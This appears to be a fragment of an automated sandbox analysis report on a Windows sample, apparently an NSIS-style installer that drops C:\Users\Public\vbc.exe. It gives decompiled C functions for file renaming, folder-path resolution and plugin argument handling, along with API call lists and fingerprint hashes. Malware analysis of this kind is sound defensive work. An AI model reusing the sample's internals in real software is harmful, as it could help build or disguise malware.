                                                                                                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F31
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040601A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00406021
                                                                                                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                                                                                                          • API String ID: 2171350718-1727408572
                                                                                                                                                                                                          • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                                                                                                                                          • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                          			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                                                                          				struct _ITEMIDLIST* _v8;
                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed char _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				signed char _v28;
                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                          				CHAR* _t39;
                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                          				char _t52;
                                                                                                                                                                                                          				char _t53;
                                                                                                                                                                                                          				char _t55;
                                                                                                                                                                                                          				char _t57;
                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                          				char* _t66;
                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                          				intOrPtr _t86;
                                                                                                                                                                                                          				char _t88;
                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                          				CHAR* _t90;
                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				signed int _t99;
                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t92 = __esi;
                                                                                                                                                                                                          				_t89 = __edi;
                                                                                                                                                                                                          				_t65 = __ebx;
                                                                                                                                                                                                          				_t38 = _a8;
                                                                                                                                                                                                          				if(_t38 < 0) {
                                                                                                                                                                                                          					_t86 =  *0x42ec1c; // 0x590f48
                                                                                                                                                                                                          					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(_t65);
                                                                                                                                                                                                          				_push(_t92);
                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                          				_t66 = _t38 +  *0x42f498;
                                                                                                                                                                                                          				_t39 = 0x42e3e0;
                                                                                                                                                                                                          				_t90 = 0x42e3e0;
                                                                                                                                                                                                          				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
                                                                                                                                                                                                          					_t90 = _a4;
                                                                                                                                                                                                          					_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t88 =  *_t66;
                                                                                                                                                                                                          					if(_t88 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t90 - _t39 - 0x400;
                                                                                                                                                                                                          					if(_t90 - _t39 >= 0x400) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t66 = _t66 + 1;
                                                                                                                                                                                                          					__eflags = _t88 - 4;
                                                                                                                                                                                                          					_a8 = _t66;
                                                                                                                                                                                                          					if(__eflags >= 0) {
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							 *_t90 = _t88;
                                                                                                                                                                                                          							_t90 =  &(_t90[1]);
                                                                                                                                                                                                          							__eflags = _t90;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *_t90 =  *_t66;
                                                                                                                                                                                                          							_t90 =  &(_t90[1]);
                                                                                                                                                                                                          							_t66 = _t66 + 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t41 =  *((char*)(_t66 + 1));
                                                                                                                                                                                                          					_t80 =  *_t66;
                                                                                                                                                                                                          					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                                                                                                                                          					_v24 = _t80;
                                                                                                                                                                                                          					_v28 = _t80 | 0x00000080;
                                                                                                                                                                                                          					_v16 = _t41;
                                                                                                                                                                                                          					_v20 = _t41 | 0x00000080;
                                                                                                                                                                                                          					_t66 = _a8 + 2;
                                                                                                                                                                                                          					__eflags = _t88 - 2;
                                                                                                                                                                                                          					if(_t88 != 2) {
                                                                                                                                                                                                          						__eflags = _t88 - 3;
                                                                                                                                                                                                          						if(_t88 != 3) {
                                                                                                                                                                                                          							__eflags = _t88 - 1;
                                                                                                                                                                                                          							if(_t88 == 1) {
                                                                                                                                                                                                          								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                                                                                                                                          								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L42:
                                                                                                                                                                                                          							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                                                                                                                                          							_t39 = 0x42e3e0;
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t97 - 0x1d;
                                                                                                                                                                                                          						if(_t97 != 0x1d) {
                                                                                                                                                                                                          							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                                                                                                                                          							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E004061AB(_t90,  *0x42f448);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t97 + 0xffffffeb - 7;
                                                                                                                                                                                                          						if(_t97 + 0xffffffeb < 7) {
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							E00406528(_t90);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L42;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t52 =  *0x42f44c;
                                                                                                                                                                                                          					__eflags = _t52;
                                                                                                                                                                                                          					_t99 = 2;
                                                                                                                                                                                                          					if(_t52 >= 0) {
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						_a8 = 1;
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						__eflags =  *0x42f4e4;
                                                                                                                                                                                                          						if( *0x42f4e4 != 0) {
                                                                                                                                                                                                          							_t99 = 4;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t80;
                                                                                                                                                                                                          						if(__eflags >= 0) {
                                                                                                                                                                                                          							__eflags = _t80 - 0x25;
                                                                                                                                                                                                          							if(_t80 != 0x25) {
                                                                                                                                                                                                          								__eflags = _t80 - 0x24;
                                                                                                                                                                                                          								if(_t80 == 0x24) {
                                                                                                                                                                                                          									GetWindowsDirectoryA(_t90, 0x400);
                                                                                                                                                                                                          									_t99 = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									__eflags = _t99;
                                                                                                                                                                                                          									if(_t99 == 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t53 =  *0x42f444;
                                                                                                                                                                                                          									_t99 = _t99 - 1;
                                                                                                                                                                                                          									__eflags = _t53;
                                                                                                                                                                                                          									if(_t53 == 0) {
                                                                                                                                                                                                          										L26:
                                                                                                                                                                                                          										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                                                                                                                                          										__eflags = _t55;
                                                                                                                                                                                                          										if(_t55 != 0) {
                                                                                                                                                                                                          											L28:
                                                                                                                                                                                                          											 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                                                                                          											__eflags =  *_t90;
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                                                                                                                                          										_v12 = _t55;
                                                                                                                                                                                                          										__imp__CoTaskMemFree(_v8);
                                                                                                                                                                                                          										__eflags = _v12;
                                                                                                                                                                                                          										if(_v12 != 0) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L28;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _a8;
                                                                                                                                                                                                          									if(_a8 == 0) {
                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                                                                                                                                          									__eflags = _t57;
                                                                                                                                                                                                          									if(_t57 == 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							GetSystemDirectoryA(_t90, 0x400);
                                                                                                                                                                                                          							goto L30;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
                                                                                                                                                                                                          							__eflags =  *_t90;
                                                                                                                                                                                                          							if( *_t90 != 0) {
                                                                                                                                                                                                          								L31:
                                                                                                                                                                                                          								__eflags = _v16 - 0x1a;
                                                                                                                                                                                                          								if(_v16 == 0x1a) {
                                                                                                                                                                                                          									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E004062E0(_t66, _t90, _t99, _t90, _v16);
                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                          							__eflags =  *_t90;
                                                                                                                                                                                                          							if( *_t90 == 0) {
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t52 - 0x5a04;
                                                                                                                                                                                                          					if(_t52 == 0x5a04) {
                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _v16 - 0x23;
                                                                                                                                                                                                          					if(_v16 == 0x23) {
                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _v16 - 0x2e;
                                                                                                                                                                                                          					if(_v16 == 0x2e) {
                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                          					return _t39;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E0040624D(_a4, _t39);
                                                                                                                                                                                                          			}



























                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                                          0x00406341
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406347
                                                                                                                                                                                                          0x00406348
                                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                                          0x0040634e
                                                                                                                                                                                                          0x004064f8
                                                                                                                                                                                                          0x00406502
                                                                                                                                                                                                          0x00406504
                                                                                                                                                                                                          0x00406504
                                                                                                                                                                                                          0x004064fa
                                                                                                                                                                                                          0x004064fc
                                                                                                                                                                                                          0x004064fe
                                                                                                                                                                                                          0x004064ff
                                                                                                                                                                                                          0x004064ff
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064f8
                                                                                                                                                                                                          0x00406354
                                                                                                                                                                                                          0x00406358
                                                                                                                                                                                                          0x00406368
                                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                                          0x00406372
                                                                                                                                                                                                          0x0040637a
                                                                                                                                                                                                          0x0040637d
                                                                                                                                                                                                          0x00406384
                                                                                                                                                                                                          0x00406385
                                                                                                                                                                                                          0x00406388
                                                                                                                                                                                                          0x004064a5
                                                                                                                                                                                                          0x004064a8
                                                                                                                                                                                                          0x004064d8
                                                                                                                                                                                                          0x004064db
                                                                                                                                                                                                          0x004064e0
                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                          0x004064e9
                                                                                                                                                                                                          0x004064ef
                                                                                                                                                                                                          0x004064f1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064f1
                                                                                                                                                                                                          0x004064aa
                                                                                                                                                                                                          0x004064ad
                                                                                                                                                                                                          0x004064c2
                                                                                                                                                                                                          0x004064c9
                                                                                                                                                                                                          0x004064af
                                                                                                                                                                                                          0x004064b6
                                                                                                                                                                                                          0x004064b6
                                                                                                                                                                                                          0x004064d1
                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                          0x0040649d
                                                                                                                                                                                                          0x0040649e
                                                                                                                                                                                                          0x0040649e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                          0x0040638e
                                                                                                                                                                                                          0x00406395
                                                                                                                                                                                                          0x00406397
                                                                                                                                                                                                          0x00406398
                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                                          0x004063c0
                                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                                          0x004063c5
                                                                                                                                                                                                          0x004063c7
                                                                                                                                                                                                          0x00406400
                                                                                                                                                                                                          0x00406403
                                                                                                                                                                                                          0x00406413
                                                                                                                                                                                                          0x00406416
                                                                                                                                                                                                          0x0040641e
                                                                                                                                                                                                          0x00406424
                                                                                                                                                                                                          0x00406424
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x00406485
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406428
                                                                                                                                                                                                          0x0040642f
                                                                                                                                                                                                          0x00406430
                                                                                                                                                                                                          0x00406432
                                                                                                                                                                                                          0x0040644c
                                                                                                                                                                                                          0x0040645a
                                                                                                                                                                                                          0x00406460
                                                                                                                                                                                                          0x00406462
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406468
                                                                                                                                                                                                          0x00406471
                                                                                                                                                                                                          0x00406474
                                                                                                                                                                                                          0x0040647a
                                                                                                                                                                                                          0x0040647e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040647e
                                                                                                                                                                                                          0x00406434
                                                                                                                                                                                                          0x00406437
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406446
                                                                                                                                                                                                          0x00406448
                                                                                                                                                                                                          0x0040644a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040644a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x0040640b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063c9
                                                                                                                                                                                                          0x004063e4
                                                                                                                                                                                                          0x004063e9
                                                                                                                                                                                                          0x004063ec
                                                                                                                                                                                                          0x0040648c
                                                                                                                                                                                                          0x0040648c
                                                                                                                                                                                                          0x00406490
                                                                                                                                                                                                          0x00406498
                                                                                                                                                                                                          0x00406498
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406490
                                                                                                                                                                                                          0x004063f6

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040640B
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?), ref: 0040645A
                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                                                                                          • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                                                                                                          • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E72E322F1(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v4;
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				signed int* _t50;
                                                                                                                                                                                                          				signed char* _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t9 = _a4 + 0x818; // 0x818
                                                                                                                                                                                                          					_t51 = (_v8 << 5) + _t9;
                                                                                                                                                                                                          					_t38 = _t51[0x18];
                                                                                                                                                                                                          					if(_t38 == 0) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t48 = 0x1a;
                                                                                                                                                                                                          					if(_t38 == _t48) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t38 != 0xffffffff) {
                                                                                                                                                                                                          						if(_t38 <= 0 || _t38 > 0x19) {
                                                                                                                                                                                                          							_t51[0x18] = _t48;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t38 = E72E312AD(_t38 - 1);
                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t38 = E72E3123B();
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						_t43 = _t38;
                                                                                                                                                                                                          						_t13 =  &(_t51[8]); // 0x820
                                                                                                                                                                                                          						_t50 = _t13;
                                                                                                                                                                                                          						if(_t51[4] >= 0) {
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t39 =  *_t51 & 0x000000ff;
                                                                                                                                                                                                          						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                                                                                                                                                                          						_v4 = _t39;
                                                                                                                                                                                                          						if(_t39 > 7) {
                                                                                                                                                                                                          							L27:
                                                                                                                                                                                                          							_t40 = GlobalFree(_t43);
                                                                                                                                                                                                          							if(_v8 == 0) {
                                                                                                                                                                                                          								return _t40;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							switch( *((intOrPtr*)(_t39 * 4 +  &M72E3247E))) {
                                                                                                                                                                                                          								case 0:
                                                                                                                                                                                                          									 *_t50 =  *_t50 & 0x00000000;
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								case 1:
                                                                                                                                                                                                          									__eax = E72E312FE(__ebx);
                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                          								case 2:
                                                                                                                                                                                                          									 *__ebp = E72E312FE(__ebx);
                                                                                                                                                                                                          									_a4 = __edx;
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								case 3:
                                                                                                                                                                                                          									__eax = E72E31224(__ebx);
                                                                                                                                                                                                          									 *(__esi + 0x1c) = __eax;
                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                          									 *__ebp = __eax;
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								case 4:
                                                                                                                                                                                                          									 *0x72e3405c =  *0x72e3405c +  *0x72e3405c;
                                                                                                                                                                                                          									__edi = GlobalAlloc(0x40,  *0x72e3405c +  *0x72e3405c);
                                                                                                                                                                                                          									 *0x72e3405c = MultiByteToWideChar(0, 0, __ebx,  *0x72e3405c, __edi,  *0x72e3405c);
                                                                                                                                                                                                          									if(_v4 != 5) {
                                                                                                                                                                                                          										 *(__esi + 0x1c) = __edi;
                                                                                                                                                                                                          										 *__ebp = __edi;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                                                                                                          										_push(__eax);
                                                                                                                                                                                                          										 *(__esi + 0x1c) = __eax;
                                                                                                                                                                                                          										_push(__edi);
                                                                                                                                                                                                          										 *__ebp = __eax;
                                                                                                                                                                                                          										__imp__CLSIDFromString();
                                                                                                                                                                                                          										__eax = GlobalFree(__edi);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								case 5:
                                                                                                                                                                                                          									if( *__ebx != 0) {
                                                                                                                                                                                                          										__eax = E72E312FE(__ebx);
                                                                                                                                                                                                          										 *__edi = __eax;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								case 6:
                                                                                                                                                                                                          									__esi =  *(__esi + 0x18);
                                                                                                                                                                                                          									__esi = __esi - 1;
                                                                                                                                                                                                          									__esi = __esi *  *0x72e3405c;
                                                                                                                                                                                                          									__esi = __esi +  *0x72e34064;
                                                                                                                                                                                                          									__eax = __esi + 0xc;
                                                                                                                                                                                                          									 *__edi = __esi + 0xc;
                                                                                                                                                                                                          									asm("cdq");
                                                                                                                                                                                                          									__eax = E72E31429(__edx, __esi + 0xc, __edx, __esi);
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                          					_t38 = E72E31224(0x72e34034);
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E32447
                                                                                                                                                                                                            • Part of subcall function 72E31224: lstrcpynA.KERNEL32(00000000,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E31234
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 72E323C2
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72E323D7
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 72E323E8
                                                                                                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 72E323F6
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E323FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                          • String ID: yFv
                                                                                                                                                                                                          • API String ID: 3730416702-2696520353
                                                                                                                                                                                                          • Opcode ID: 6ed4fa0f0c30c7b53ad78e8b0043dcb3c9171a2687b7b9660ccfab6c309ae07b
                                                                                                                                                                                                          • Instruction ID: 35e5229f678295ccb967e15e287267f3045b3f5dcf5ada8945bb8ba7f421ed49
